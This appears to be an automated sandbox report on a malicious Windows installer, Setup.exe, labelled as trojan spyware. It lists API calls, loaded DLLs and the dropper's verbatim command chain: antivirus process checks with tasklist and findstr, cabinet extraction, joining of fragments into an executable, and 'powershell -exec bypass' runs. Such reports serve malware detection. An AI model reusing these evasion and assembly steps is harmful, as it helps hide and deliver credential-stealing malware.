            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.169.205:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_002DF7C7
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_002DF55C
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002F9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_002F9FD2
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002D4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,11_2_002D4763
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002C1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_002C1B4D
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002CF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_002CF20D
            Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\EngagementRisksJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\LordGarminJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\BarcelonaTrannyJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\LabInterfacesJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0040737E0_2_0040737E
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406EFE0_2_00406EFE
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004079A20_2_004079A2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004049A80_2_004049A8
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0028801711_2_00288017
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0027E14411_2_0027E144
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0026E1F011_2_0026E1F0
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0029A26E11_2_0029A26E
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002822A211_2_002822A2
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002622AD11_2_002622AD
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0027C62411_2_0027C624
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0029E87F11_2_0029E87F
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002EC8A411_2_002EC8A4
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002D2A0511_2_002D2A05
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00296ADE11_2_00296ADE
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002C8BFF11_2_002C8BFF
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0027CD7A11_2_0027CD7A
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0028CE1011_2_0028CE10
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0029715911_2_00297159
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0026924011_2_00269240
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002F531111_2_002F5311
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002696E011_2_002696E0
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0028170411_2_00281704
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00281A7611_2_00281A76
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00269B6011_2_00269B60
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00287B8B11_2_00287B8B
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00281D2011_2_00281D20
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00287DBA11_2_00287DBA
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00281FE711_2_00281FE7
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\280366\Hc.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: String function: 0027FD52 appears 40 times
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: String function: 00280DA0 appears 46 times
            Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 004062CF appears 58 times
            Source: Setup.exeStatic PE information: invalid certificate
            Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: Commandline size = 4588
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: Commandline size = 4588Jump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@30/31@4/3
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002D41FA GetLastError,FormatMessageW,11_2_002D41FA
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002C2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_002C2010
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002C1A0B AdjustTokenPrivileges,CloseHandle,11_2_002C1A0B
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002CDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_002CDD87
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002D3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_002D3A0E
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
            Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsm8CCA.tmpJump to behavior
            Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Hc.com, 0000000B.00000003.2044421982.0000000004450000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044108770.000000000447F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
            Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Agrees
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com I
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E AgreesJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems IJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com IJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <Jump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: uxtheme.dllJump to behavior
